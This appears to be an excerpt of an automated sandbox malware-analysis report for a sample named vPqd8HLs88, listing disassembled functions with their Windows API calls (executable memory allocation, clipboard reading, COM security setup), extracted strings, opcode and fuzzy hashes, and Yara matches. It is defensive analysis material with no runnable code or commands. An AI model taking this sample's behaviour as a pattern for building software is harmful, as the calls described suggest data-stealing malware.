CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C9B4

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: beecb8cd999f9e4da6481a63c285603563a02b24e88df8216945b4048d242384
Instruction ID: c17217ffd58dfb18370714d3c73d622bd39e10f1ccaeef6b2f5d6506bd03da90
Opcode Fuzzy Hash: beecb8cd999f9e4da6481a63c285603563a02b24e88df8216945b4048d242384
Instruction Fuzzy Hash: 3AD0C9357C934077F2744B48ED13F1232119702F15F700224B362FE2D0C9E075108A0C

Function 00439A70 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00439A80

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 52db0f8560daf10d68f48b5be9581fe74425e7377f7876e993454923530bd23d
Instruction ID: d14ea394634640ee8a416866ac928f3a124760014de8c8652fe0493fc404303f
Opcode Fuzzy Hash: 52db0f8560daf10d68f48b5be9581fe74425e7377f7876e993454923530bd23d
Instruction Fuzzy Hash: C9C04C31445220AAD6106B15EC05BC63A549F496A1F011095B408A70718660AC818698

Function 00920465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009204B6

Memory Dump Source

Source File: 00000000.00000002.1667924711.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 14a7d27b4c5615cf9885154da2c0640a2b1f6879e650bc47366b843ff1ca7268
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 11112B79A40208EFDB01DF98C985E98BBF5AF48350F058094FA489B362D371EA50DF80

Non-executed Functions

Function 00435373 Relevance: 34.1, Strings: 27, Instructions: 313COMMON

Download Yara Rule

Strings

I, xrefs: 00435491
>, xrefs: 0043557F
$, xrefs: 00435443
9, xrefs: 004355B4
%, xrefs: 004353EF
0, xrefs: 00435479
5, xrefs: 004355A4
-, xrefs: 0043540B
), xrefs: 004353FD
0, xrefs: 0043569E
O, xrefs: 004354A1
0, xrefs: 00435481
7, xrefs: 004355AC
7, xrefs: 00435489
2, xrefs: 00435461
?, xrefs: 004355CC
=, xrefs: 004355C4
K, xrefs: 004354A9
c, xrefs: 004355A0
<, xrefs: 00435576
,, xrefs: 004353E1
;, xrefs: 004355BC
8, xrefs: 00435419
,, xrefs: 00435435
5, xrefs: 00435459
D, xrefs: 00435499
;, xrefs: 00435469

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: $$%$)$,$,$-$0$0$0$2$5$5$7$7$8$9$;$;$<$=$>$?$D$I$K$O$c
API String ID: 0-1278310319
Opcode ID: 5d6b32658f2d2117531adf7e28d284070f981f6d59efd2551391420518eb34e1
Instruction ID: fbed2b24997769b95047de3bc88a52cd9bc89305883c9ffb242a8f2a3930c613
Opcode Fuzzy Hash: 5d6b32658f2d2117531adf7e28d284070f981f6d59efd2551391420518eb34e1
Instruction Fuzzy Hash: B9E1D121D087E98ADB22C67C88083DDBFB15B57324F1843D9D4E9AB3D2C7740A46CB66

Function 009855DA Relevance: 34.1, Strings: 27, Instructions: 313COMMON

Download Yara Rule

Strings

c, xrefs: 00985807
=, xrefs: 0098582B
%, xrefs: 00985656
<, xrefs: 009857DD
-, xrefs: 00985672
0, xrefs: 009856E8
$, xrefs: 009856AA
;, xrefs: 009856D0
O, xrefs: 00985708
7, xrefs: 009856F0
,, xrefs: 00985648
D, xrefs: 00985700
2, xrefs: 009856C8
5, xrefs: 0098580B
>, xrefs: 009857E6
?, xrefs: 00985833
9, xrefs: 0098581B
;, xrefs: 00985823
8, xrefs: 00985680
0, xrefs: 009856E0
0, xrefs: 00985905
), xrefs: 00985664
I, xrefs: 009856F8
,, xrefs: 0098569C
7, xrefs: 00985813
5, xrefs: 009856C0
K, xrefs: 00985710

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: $$%$)$,$,$-$0$0$0$2$5$5$7$7$8$9$;$;$<$=$>$?$D$I$K$O$c
API String ID: 0-1278310319
Opcode ID: 3520f65678bd50cd584d15120946f895d35347bddff281b068816ef8e70d1f17
Instruction ID: 752febc36691b1a281eda674752ace88567d81be4278281cfa6b72d5860645cd
Opcode Fuzzy Hash: 3520f65678bd50cd584d15120946f895d35347bddff281b068816ef8e70d1f17
Instruction Fuzzy Hash: 41E1C121D087E98ADB22C67C8C483DDBFA15B57324F1883D9D4E9AB3D2C7750A46CB52

Function 009870F7 Relevance: 30.4, APIs: 8, Strings: 9, Instructions: 647memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0044068C,00000000,00000001,0044067C,00000000), ref: 00987384
SysAllocString.OLEAUT32(FA46F8B5), ref: 0098746D
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009874AB
SysAllocString.OLEAUT32(FA46F8B5), ref: 00987503
SysAllocString.OLEAUT32(FA46F8B5), ref: 0098758E
VariantInit.OLEAUT32(E1E0FFF6), ref: 009875FE
VariantClear.OLEAUT32(E1E0FFF6), ref: 00987730
SysFreeString.OLEAUT32(00000000), ref: 00987767

Strings

$i/k, xrefs: 00987513
7e#g, xrefs: 0098757C
TU, xrefs: 0098756B
*y5{, xrefs: 00987533
coPQ, xrefs: 0098716C
A;, xrefs: 009873B2
E5G, xrefs: 0098754B
/m:o, xrefs: 0098751B
R&^, xrefs: 009873C6

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
String ID: $i/k$*y5{$/m:o$7e#g$A;$R&^$TU$coPQ$E5G
API String ID: 2775254435-1946897041
Opcode ID: dcad9155d69ce425e6e29318b7459b3474ba0fd8dac4eccc67f210e19dec3fab
Instruction ID: 310468082772f85b374b9f067b07c07df68fc0c6395c8e23d2f1e78c2eae785b
Opcode Fuzzy Hash: dcad9155d69ce425e6e29318b7459b3474ba0fd8dac4eccc67f210e19dec3fab
Instruction Fuzzy Hash: F122FD726083409BD310DFA9C884B6BFBE6EFC5724F28892CF99597381D678D805CB56

Function 00424B57 Relevance: 28.0, Strings: 22, Instructions: 466COMMON

Download Yara Rule

Strings

7p9r, xrefs: 004253D7
4N, xrefs: 00424C1D
{M, xrefs: 00425313
ReQg, xrefs: 00424F45
2t%v, xrefs: 004253E1
hz, xrefs: 00425305
;l9n, xrefs: 004253F5
qAsC, xrefs: 00424EEB
KB, xrefs: 00424BAD, 00424BD9
^\, xrefs: 00424C24
Z\, xrefs: 004251AE
4N, xrefs: 00424D21
tMvO, xrefs: 00424F09
-`3b, xrefs: 004253FF
hYn[, xrefs: 00424F27
@D, xrefs: 00424C2B
tK, xrefs: 0042530C
(|?~, xrefs: 004253D0
\C, xrefs: 0042531A
"d3f, xrefs: 00425409
'h8j, xrefs: 004253EB
dUgW, xrefs: 00424F1D

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: KB$"d3f$'h8j$(|?~$-`3b$2t%v$4N$4N$7p9r$;l9n$@D$ReQg$\C$^\$dUgW$hYn[$hz$qAsC$tMvO$tK${M$Z\
API String ID: 0-4131999672
Opcode ID: 3412665ea954a5d1f72cbf77ed50f46baf41cbf95b39a6ec64c5615c7ed954fe
Instruction ID: be35867440bbf1f7b9754dd3d141f074c8d0cf00ddee5ceac3bf05778880b5b7
Opcode Fuzzy Hash: 3412665ea954a5d1f72cbf77ed50f46baf41cbf95b39a6ec64c5615c7ed954fe
Instruction Fuzzy Hash: D8323EB4A11315CFDB58CF19D580A99BBB1FB41300F5A82A8C9589F76ADB75C882CF84

Function 00974E47 Relevance: 26.7, Strings: 21, Instructions: 431COMMON

Download Yara Rule

Strings

\C, xrefs: 00975581
2t%v, xrefs: 00975648
tK, xrefs: 00975573
'h8j, xrefs: 00975652
@D, xrefs: 00974E92
{M, xrefs: 0097557A
^\, xrefs: 00974E8B
-`3b, xrefs: 00975666
(|?~, xrefs: 00975637
qAsC, xrefs: 00975152
;l9n, xrefs: 0097565C
Z\, xrefs: 00975415
tMvO, xrefs: 00975170
ReQg, xrefs: 009751AC
4N, xrefs: 00974F88
"d3f, xrefs: 00975670
7p9r, xrefs: 0097563E
hYn[, xrefs: 0097518E
dUgW, xrefs: 00975184
4N, xrefs: 00974E84
hz, xrefs: 0097556C

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: "d3f$'h8j$(|?~$-`3b$2t%v$4N$4N$7p9r$;l9n$@D$ReQg$\C$^\$dUgW$hYn[$hz$qAsC$tMvO$tK${M$Z\
API String ID: 0-1400579113
Opcode ID: 77c289c3f88b24daf2dc686fb6004ed8886a2da2f6cbbabb5caf0b04d5be3892
Instruction ID: 01233c47cd92f8e3fd44308c1815b20b4fb3293877a37af44a9530a0470c3761
Opcode Fuzzy Hash: 77c289c3f88b24daf2dc686fb6004ed8886a2da2f6cbbabb5caf0b04d5be3892
Instruction Fuzzy Hash: 4D323EB4615345CFDB58CF19C580A98BBB1FB41300F6A82A8C9599F76BDB75C882CF81

Function 00431EF0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 100clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00431F00
GetWindowLongW.USER32 ref: 00431F25
GetClipboardData.USER32 ref: 00431F35
GlobalLock.KERNEL32 ref: 00431F4E
GlobalUnlock.KERNEL32 ref: 0043203B
CloseClipboard.USER32 ref: 00432044

Strings

", xrefs: 00431FBF
%, xrefs: 00431FB5
), xrefs: 00431FA1
, xrefs: 00431FAB
3, xrefs: 00431F9C
,, xrefs: 00431FB0
i, xrefs: 00431FC4
], xrefs: 00431F97

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: $"$%$)$,$3$]$i
API String ID: 2832541153-1573611430
Opcode ID: 7e3f79cf8ddd22ae6e6f56a64b6e3632e3df569b0aa8eb0cc6e788f8b563eae0
Instruction ID: 2ac8f52b9fcdf01d9135f32bc7069f654f115b24f587ae1aa6c0bc2cccbff0a6
Opcode Fuzzy Hash: 7e3f79cf8ddd22ae6e6f56a64b6e3632e3df569b0aa8eb0cc6e788f8b563eae0
Instruction Fuzzy Hash: 43416E7150C7808ED301EFB8D58835FBFE0AB86308F04586EE9C997282D6B9854CC79B

Function 0041EAC0 Relevance: 13.4, Strings: 10, Instructions: 882COMMON

Download Yara Rule

Strings

Rg`9, xrefs: 0041EE70
fy`y, xrefs: 0041EE86
i#Iu, xrefs: 0041EE91
7!, xrefs: 0041EC79
RceK, xrefs: 0041EE7B
cajk, xrefs: 0041EE9C
7., xrefs: 0041EEBD
Exx7, xrefs: 0041EC81
=>;, xrefs: 0041F1FA
qbO{, xrefs: 0041EE60

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: =>;$7.$7!$Exx7$RceK$Rg`9$cajk$fy`y$i#Iu$qbO{
API String ID: 0-3602867193
Opcode ID: 33d212c96fd6814c2a11ae1e68bd0eb74c5ebe334d9edf1d89eaebbd49a5b0c8
Instruction ID: 9e67af8fc63d6b3779e1a3c3432931e917dbbd2722ca4470168be63364704561
Opcode Fuzzy Hash: 33d212c96fd6814c2a11ae1e68bd0eb74c5ebe334d9edf1d89eaebbd49a5b0c8
Instruction Fuzzy Hash: 0452487450C3918FC725CF25C8406AFBBE1AF95314F084A6EE8E54B382DB39994AC796

Function 0096ED27 Relevance: 13.4, Strings: 10, Instructions: 882COMMON

Download Yara Rule

Strings

RceK, xrefs: 0096F0E2
cajk, xrefs: 0096F103
Rg`9, xrefs: 0096F0D7
qbO{, xrefs: 0096F0C7
7!, xrefs: 0096EEE0
Exx7, xrefs: 0096EEE8
7., xrefs: 0096F124
i#Iu, xrefs: 0096F0F8
fy`y, xrefs: 0096F0ED
=>;, xrefs: 0096F461

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: =>;$7.$7!$Exx7$RceK$Rg`9$cajk$fy`y$i#Iu$qbO{
API String ID: 0-3602867193
Opcode ID: d4e465416bfe650e5f1098282e309c2c41405ef9414de7e39134a8d3124e67d1
Instruction ID: 69d6470008afb4385f0b1086d9fd62348fb7b5ca88166a31201ab60836f843fd
Opcode Fuzzy Hash: d4e465416bfe650e5f1098282e309c2c41405ef9414de7e39134a8d3124e67d1
Instruction Fuzzy Hash: 9452457150C3918FC725DF28D86076EBBE1AF92304F088A7CE4E55B392DB359909CB92

Function 00425FF0 Relevance: 12.8, Strings: 10, Instructions: 259COMMON

Download Yara Rule

Strings

A!V#, xrefs: 00426104
a)D+, xrefs: 00426114
P5j7, xrefs: 0042612C
t9S;, xrefs: 00426134
J=[?, xrefs: 0042613C
H-K/, xrefs: 0042611C
H1W3, xrefs: 00426124
)E+G, xrefs: 0042614C
A%z', xrefs: 0042610C
*+, xrefs: 004262B4

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: )E+G$*+$A!V#$A%z'$H-K/$H1W3$J=[?$P5j7$a)D+$t9S;
API String ID: 0-1048206937
Opcode ID: dc567a36316d777da4cf3f87b8300da03738c1b31d72e3d1e72c8b640c5a5981
Instruction ID: ad026e03bf7ebb5cdd50c9cd0803b66ff92b5d3cb43946da3003fa1726a16d65
Opcode Fuzzy Hash: dc567a36316d777da4cf3f87b8300da03738c1b31d72e3d1e72c8b640c5a5981
Instruction Fuzzy Hash: 257145B1A083508BC714CF15E89166BBBF1FFD5350F55892DE8CA8B391EB389905CB86

Function 00976257 Relevance: 12.8, Strings: 10, Instructions: 259COMMON

Download Yara Rule

Strings

H-K/, xrefs: 00976383
t9S;, xrefs: 0097639B
A%z', xrefs: 00976373
J=[?, xrefs: 009763A3
H1W3, xrefs: 0097638B
a)D+, xrefs: 0097637B
P5j7, xrefs: 00976393
)E+G, xrefs: 009763B3
*+, xrefs: 0097651B
A!V#, xrefs: 0097636B

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: )E+G$*+$A!V#$A%z'$H-K/$H1W3$J=[?$P5j7$a)D+$t9S;
API String ID: 0-1048206937
Opcode ID: 9557d932f895b842f89375490f4d2970dc734f102eb9ccf093ac965d3f4baa98
Instruction ID: 85499eeeec7c105ae88145fc5a6dc7608a2fe96425a97b6d5d08774ebd197ae9
Opcode Fuzzy Hash: 9557d932f895b842f89375490f4d2970dc734f102eb9ccf093ac965d3f4baa98
Instruction Fuzzy Hash: C57123B29083408BD718DF19C89166BBBF5FFD5350F148A2CE8CA8B391E7749905CB86

Function 004093F0 Relevance: 10.5, Strings: 8, Instructions: 466COMMON

Download Yara Rule

Strings

]P`X, xrefs: 004094DF
ne, xrefs: 0040944D
$01;, xrefs: 00409425
>7;<, xrefs: 0040943D
vm/;, xrefs: 0040941D
908#, xrefs: 0040942D
!+2j, xrefs: 0040940D
w!w4, xrefs: 00409435

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: !+2j$$01;$908#$>7;<$]P`X$ne$vm/;$w!w4
API String ID: 0-1816957969
Opcode ID: 2f581171202c42e70a312a3b38c524f9ab85c7b985f9e35208e7a3bd2d6c21d3
Instruction ID: 962811ab211e1d28570dac15bbaa77c06cd37b2d9e3f7fb8cc951b72409213e1
Opcode Fuzzy Hash: 2f581171202c42e70a312a3b38c524f9ab85c7b985f9e35208e7a3bd2d6c21d3
Instruction Fuzzy Hash: 58D1137150C3918AC719CF39845066BFFE1ABA7304F1C89AEE4D59B383D6398909C7A6

Function 00959657 Relevance: 10.5, Strings: 8, Instructions: 466COMMON

Download Yara Rule

Strings

ne, xrefs: 009596B4
$01;, xrefs: 0095968C
>7;<, xrefs: 009596A4
908#, xrefs: 00959694
vm/;, xrefs: 00959684
w!w4, xrefs: 0095969C
!+2j, xrefs: 00959674
]P`X, xrefs: 00959746

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: !+2j$$01;$908#$>7;<$]P`X$ne$vm/;$w!w4
API String ID: 0-1816957969
Opcode ID: 2f581171202c42e70a312a3b38c524f9ab85c7b985f9e35208e7a3bd2d6c21d3
Instruction ID: c90089971df7f525ac566b5a068af993eaf5ad0d781b1d2f2073aa50a9ff4872
Opcode Fuzzy Hash: 2f581171202c42e70a312a3b38c524f9ab85c7b985f9e35208e7a3bd2d6c21d3
Instruction Fuzzy Hash: E4D1247150C3D18AD719CF39845066BFFE1ABA3305F1C89ADE8D58B383D639850AC7A2

Function 00426FD4 Relevance: 9.3, Strings: 7, Instructions: 528COMMON

Download Yara Rule

Strings

|>uj, xrefs: 0042744E
twHp, xrefs: 00427447
*+, xrefs: 00427783
b_\j, xrefs: 0042742B
fooab_\j, xrefs: 00427499
Vu6^,GaSfooab_\j, xrefs: 004270FB
Vu6^, xrefs: 00427440

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: *+$Vu6^$Vu6^,GaSfooab_\j$b_\j$fooab_\j$twHp$|>uj
API String ID: 0-2039688736
Opcode ID: f4a2e7fd38d884fb034a0d3e8ace74e7d066327a33d758946f9801d5e0647866
Instruction ID: 7396e31f4ad740732c061ad3d16555dc77d21cfc48994c4ea944b2f41ed664f3
Opcode Fuzzy Hash: f4a2e7fd38d884fb034a0d3e8ace74e7d066327a33d758946f9801d5e0647866
Instruction Fuzzy Hash: FA0216B5E08261CFDB14CF64E8817AFB7B1EF46304F19446ED885AB342D7399902CBA5

Function 0040B406 Relevance: 9.2, Strings: 7, Instructions: 454COMMON

Download Yara Rule

Strings

!hij, xrefs: 0040B738
x0T2, xrefs: 0040B684
,p&r, xrefs: 0040B724
%D$F, xrefs: 0040B706
-t&v, xrefs: 0040B72E
<@ B, xrefs: 0040B6FC
$|(~, xrefs: 0040B71A

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: !hij$$|(~$%D$F$,p&r$-t&v$<@ B$x0T2
API String ID: 0-2398737378
Opcode ID: cc36970cb90afd64c1b5d136139abf7b079255cf7bb7bbab7fcaaa5b6473f7ee
Instruction ID: 99f8c0c89dd31b0ce8ec603442d68eec83d1285974430dc12138a7f3e579f288
Opcode Fuzzy Hash: cc36970cb90afd64c1b5d136139abf7b079255cf7bb7bbab7fcaaa5b6473f7ee
Instruction Fuzzy Hash: D50299B4600700CFD728CF29C895B127BB1FB45314F1586ACE95A8F7AAD775A805CFA4

Function 004098F0 Relevance: 9.2, Strings: 7, Instructions: 415COMMON

Download Yara Rule

Strings

AZ, xrefs: 00409C24
M\, xrefs: 00409C2C
u, xrefs: 00409AD8
HR, xrefs: 00409C1C
C5F2A5E48D15C7558916307CF382561B, xrefs: 004099E2
de, xrefs: 00409D65
MW, xrefs: 00409C14

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: AZ$C5F2A5E48D15C7558916307CF382561B$HR$MW$M\$de$u
API String ID: 0-2494720039
Opcode ID: 8771c1537253ace1c4ffb28fcf261afec6df3f075da17789c2a0a5ad85969621
Instruction ID: a6962564b024dc76ebe51450f4a540e682057812aa4ac59f43f148b8eada2d6d
Opcode Fuzzy Hash: 8771c1537253ace1c4ffb28fcf261afec6df3f075da17789c2a0a5ad85969621
Instruction Fuzzy Hash: 3CD134726087409BD718CF65C8516AFBBE2EFC5304F18892DE4D59B392CB38D909CB96

Function 00432060 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 169COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004320A2
GetSystemMetrics.USER32 ref: 004320B2

Strings

'/C, xrefs: 00432292
;%C, xrefs: 004322EA
, xrefs: 0043219F

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: MetricsSystem
String ID: $'/C$;%C
API String ID: 4116985748-4198472220
Opcode ID: f4fefd3f3f432c54fb429ee2531fd8ae9419fdb06cc3e1da2e17a9bd189c8e85
Instruction ID: 0f73a1581adc0269d885ad3a2362c712946d20e258ec1fb036dc00bc5de3dcd6
Opcode Fuzzy Hash: f4fefd3f3f432c54fb429ee2531fd8ae9419fdb06cc3e1da2e17a9bd189c8e85
Instruction Fuzzy Hash: ABB16CB0409780CFE760DF15E58878FBBE0BB89308F51891ED5E89B251DBB95458CF86

Function 0041A0A0 Relevance: 8.9, APIs: 2, Strings: 2, Instructions: 1887COMMON

Download Yara Rule

APIs

Part of subcall function 0043B540: LdrInitializeThunk.NTDLL(0043D75B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B56E

FreeLibrary.KERNEL32(?), ref: 0041A93D
FreeLibrary.KERNEL32(?), ref: 0041AA0B

Strings

I,~M, xrefs: 0041B412
Mw, xrefs: 0041A93D, 0041AA0B

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: I,~M$Mw
API String ID: 764372645-1045714936
Opcode ID: 98fefe62103f006e76adc547bccfece65b039f7f4db6d844402769149d7b8795
Instruction ID: bdfe155b88a39e1e6441da59ec174187d495de05e97d6a8753ecb0654d06f7f9
Opcode Fuzzy Hash: 98fefe62103f006e76adc547bccfece65b039f7f4db6d844402769149d7b8795
Instruction Fuzzy Hash: 24C29976A883504BC724CFA4CC803ABB7D2EBC9314F19863ED99587391E7B89D4587C6

Function 00959B57 Relevance: 7.9, Strings: 6, Instructions: 415COMMON

Download Yara Rule

Strings

de, xrefs: 00959FCC
M\, xrefs: 00959E93
u, xrefs: 00959D3F
HR, xrefs: 00959E83
AZ, xrefs: 00959E8B
MW, xrefs: 00959E7B

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: AZ$HR$MW$M\$de$u
API String ID: 0-120532078
Opcode ID: d64f34769f08816fd6406b712aa56c165953e2b93eda5f414cdeffd65aee6856
Instruction ID: 1d3dd31121362533eca5ae3e9342783bbf6120f3063055f1c7a3ed2ccd79ffe7
Opcode Fuzzy Hash: d64f34769f08816fd6406b712aa56c165953e2b93eda5f414cdeffd65aee6856
Instruction Fuzzy Hash: 24D125B26087809BD718CF65C85166FBBE2EBD5304F18892CE9D59B291DB34D909CB82

Function 0096A307 Relevance: 7.1, APIs: 2, Strings: 1, Instructions: 1887COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0096ABA4
FreeLibrary.KERNEL32(?), ref: 0096AC72

Strings

I,~M, xrefs: 0096B679

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: I,~M
API String ID: 3664257935-1339956858
Opcode ID: e0aca29f99186c85229ac918451a06856e8cc4352d518a764de5a7a6db091ea7
Instruction ID: 93e79a50c3f6be18c1f7bc723687ed1b6d9a65f96776af972feeb62597e411b8
Opcode Fuzzy Hash: e0aca29f99186c85229ac918451a06856e8cc4352d518a764de5a7a6db091ea7
Instruction Fuzzy Hash: ECC27776A483504BC724CFA4CCC076BB7D6EBC5320F1D863DE99597291EBB4AD058B82

Function 00428E72 Relevance: 6.7, Strings: 5, Instructions: 462COMMON

Download Yara Rule

Strings

At, xrefs: 004291D8
GI, xrefs: 00428EDF
CE, xrefs: 004290D6
=t, xrefs: 00429191
MB, xrefs: 00428EE6

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: =t$At$GI$MB$CE
API String ID: 0-1115079355
Opcode ID: bab740c4131d47c8ee67dc110200e8d71687f758c37eb31044e26f8606fb6957
